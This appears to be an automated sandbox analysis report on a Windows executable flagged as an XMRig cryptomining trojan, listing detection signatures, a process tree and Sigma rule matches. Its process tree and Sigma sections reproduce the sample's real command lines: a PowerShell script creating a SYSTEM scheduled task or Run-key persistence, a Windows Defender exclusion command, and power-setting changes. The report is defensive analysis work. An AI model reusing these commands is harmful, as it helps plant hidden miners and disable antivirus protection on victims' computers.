Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ahlntQUj2t.exe

Overview

General Information

Sample name:ahlntQUj2t.exe
renamed because original name is a hash value
Original sample name:75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9.exe
Analysis ID:1548723
MD5:934e9a3e294fa41c527fbd6dc867ddec
SHA1:57edab4c313a7b3bf083a0c3364195b0491e00ba
SHA256:75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ahlntQUj2t.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\ahlntQUj2t.exe" MD5: 934E9A3E294FA41C527FBD6DC867DDEC)
    • powershell.exe (PID: 7988 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7716 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7972 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8040 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8116 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8148 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8168 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 7264 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6752 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • xjfgcnhmcvxy.exe (PID: 6384 cmdline: "C:\Program Files\xjfgcnhmcvxy.exe" MD5: 934E9A3E294FA41C527FBD6DC867DDEC)
    • conhost.exe (PID: 2384 cmdline: C:\Windows\System32\conhost.exe xcgkmjxjdowq MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 8180 cmdline: C:\Windows\System32\conhost.exe gzssianthtxzdggz 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvug8Rp3hiani4Twfqfj5pfOQ4C5/lIR+WrKX/39lFBfrYgVA5xlELaQrgfEYI/1+l+sm6d1wY+jp8lQ+gyInBZtRryf27JkgwVg8+gc8zt/+Qw/FqR21gXGsiWp5M1/PaUO8B8L/yFa9vhQOOMQzU9osOZwr+lVWCnvU0S6ajO3l3PA+IO3tZ+KIHzg9oJDykmRT9FPoLVpg3f2E+S/d4wYAneGaTBaw9u+h7ySSQW4uLa2RdrQlsNvaothGQq4OkU9/7weTT4gwdlFYcJqzkf6CrPgHCU2Z2X/1LqnGA0Z/oGM3RQZ3KFMH6aI6u72Mx/Roo9xz5ogo8pI2aMP1z57eBCyYbXyiGT0rCG540iwNf53KRDw5r+qu9TX7DnABrUnuCbtJtyaOErrfhHdH0mzc3oHhwbzk+xXdFEnj5LezfN80ibSpckaUWKu/Nc8n5n3862TFcZoV3+5pG7wnvACa9eswJk6IY7ANEpRFN9HJzRPurRT3aTK7NgnMwc4gmU= MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7112 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1408 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7796 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7164 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2196 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7824 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 7460 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8136 cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1888 cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 4268 cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\tkfgvduf.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000022.00000002.2615840139.000002B9B44C4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000022.00000002.2615840139.000002B9B43E9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 1 entries
              SourceRuleDescriptionAuthorStrings
              16.2.xjfgcnhmcvxy.exe.7ff72348c320.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                16.2.xjfgcnhmcvxy.exe.7ff72348fc00.3.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  16.2.xjfgcnhmcvxy.exe.7ff72347d500.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    16.2.xjfgcnhmcvxy.exe.7ff723470000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      16.2.xjfgcnhmcvxy.exe.7ff72348fc00.3.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ahlntQUj2t.exe", ParentImage: C:\Users\user\Desktop\ahlntQUj2t.exe, ParentProcessId: 7704, ParentProcessName: ahlntQUj2t.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTr
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ahlntQUj2t.exe", ParentImage: C:\Users\user\Desktop\ahlntQUj2t.exe, ParentProcessId: 7704, ParentProcessName: ahlntQUj2t.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTr
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL, CommandLine: "C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL, CommandLine|base64offset|contains: , Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" }, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7264, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL, ProcessId: 6752, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7716, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ahlntQUj2t.exe", ParentImage: C:\Users\user\Desktop\ahlntQUj2t.exe, ParentProcessId: 7704, ParentProcessName: ahlntQUj2t.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTr
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7716, ProcessName: powershell.exe
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ahlntQUj2t.exe", ParentImage: C:\Users\user\Desktop\ahlntQUj2t.exe, ParentProcessId: 7704, ParentProcessName: ahlntQUj2t.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object 